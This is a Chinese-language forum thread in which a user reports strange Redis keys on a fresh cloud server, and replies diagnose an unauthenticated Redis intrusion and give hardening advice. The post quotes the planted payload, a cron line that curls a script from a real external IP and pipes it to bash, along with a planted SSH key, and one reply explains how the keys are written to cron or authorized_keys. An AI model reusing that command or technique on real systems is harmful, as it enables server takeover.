V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
V2EX 提问指南
loongwang
V2EX  ›  问与答

jd 云安装 redis 后出现两个键

  •  
  •   loongwang · 2018-03-28 09:38:55 +08:00 · 1844 次点击
    这是一个创建于 2440 天前的主题,其中的信息可能已经有所发展或是发生改变。

    一条内容是

    -e 
    
    */10 * * * * curl -s http://207.226.143.174:443/reinstall.sh | bash
    

    另一条是

    ssh-a xxxxxxxxxx...
    root@hxkvm
    

    不是很明白,目前只开放了 redis mysql 和 ssh 这三个端口

    第 1 条附言  ·  2018-03-28 14:47:37 +08:00
    关了 ,先用本地 docker 了
    18 条回复    2018-04-24 18:00:30 +08:00
    tomczhen
        1
    tomczhen  
       2018-03-28 09:44:04 +08:00
    请个运维吧,兼职的也行。
    ericls
        2
    ericls  
       2018-03-28 09:46:34 +08:00 via iPhone
    你看看你的 authorized_keys 有没有被串改?
    loongwang
        3
    loongwang  
    OP
       2018-03-28 09:59:47 +08:00
    @tomczhen 自己的,就用来开 mysql 和 redis.没啥重要东西
    dltsgl
        4
    dltsgl  
       2018-03-28 10:04:29 +08:00
    redis 没密码吧?被人远程攻击了?
    iamsee
        5
    iamsee  
       2018-03-28 11:23:48 +08:00
    这是被攻击了
    loongwang
        6
    loongwang  
    OP
       2018-03-28 11:52:35 +08:00
    @dltsgl 刚装好就看到., 删了还有用吗
    SakuraKuma
        7
    SakuraKuma  
       2018-03-28 12:12:58 +08:00
    装好没启动之前就应该设置密码。
    loongwang
        8
    loongwang  
    OP
       2018-03-28 12:34:16 +08:00 via Android
    @SakuraKuma。。。gg,先用着了
    airycanon
        9
    airycanon  
       2018-03-28 13:16:05 +08:00
    redis-cli 然后 CONFIG GET dir 看看值是什么。
    loongwang
        10
    loongwang  
    OP
       2018-03-28 13:26:42 +08:00
    @airycanon

    1) "dir"
    2) "/var/lib/redis/6379"
    lairdnote
        11
    lairdnote  
       2018-03-28 13:36:50 +08:00
    兼职的运维要吗?
    msg7086
        12
    msg7086  
       2018-03-28 14:30:07 +08:00
    被人入侵了的话:
    1. 如果你 root 账号被人拿到的话,除了重装系统,你不可能把系统弄干净。
    2. 如果你服务器被人入侵以后干坏事的话,你需要付法律责任。
    SourceMan
        13
    SourceMan  
       2018-03-28 14:48:56 +08:00
    redis 不是默认改端口、禁外网的吗?
    abmin521
        14
    abmin521  
       2018-03-28 16:22:14 +08:00
    redis 未授权漏洞
    julyclyde
        15
    julyclyde  
       2018-03-29 08:28:52 +08:00
    这格式像 crontab 啊
    问题是 crontab 不能通过网络注入吧?
    loongwang
        16
    loongwang  
    OP
       2018-03-29 08:35:49 +08:00 via Android
    @julyclyde 看着像是被入侵了
    airycanon
        17
    airycanon  
       2018-04-24 09:48:26 +08:00
    未读提醒有问题,没看到你的回复。
    你需要注意 redis 配置的 dir 和 dbfilename,因为 redis 在执行 bgsave 的时候会把 key 写入文件 dir/dbfilename 中。
    第一个 key 如果写入 /var/spool/cron 里,就可以变成 crontab 定时任务。
    第二个 key 很明显就是 ssh 公钥了,可以直接 ssh 登录。

    如果你的 redis 需要开放到公网,不要用 root 用户启动,最好加个验证并设置 bing ip。
    loongwang
        18
    loongwang  
    OP
       2018-04-24 18:00:30 +08:00
    @airycanon 暂时关闭服务器了,后面如果再用到就谨慎一点
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   2704 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 23ms · UTC 09:23 · PVG 17:23 · LAX 01:23 · JFK 04:23
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.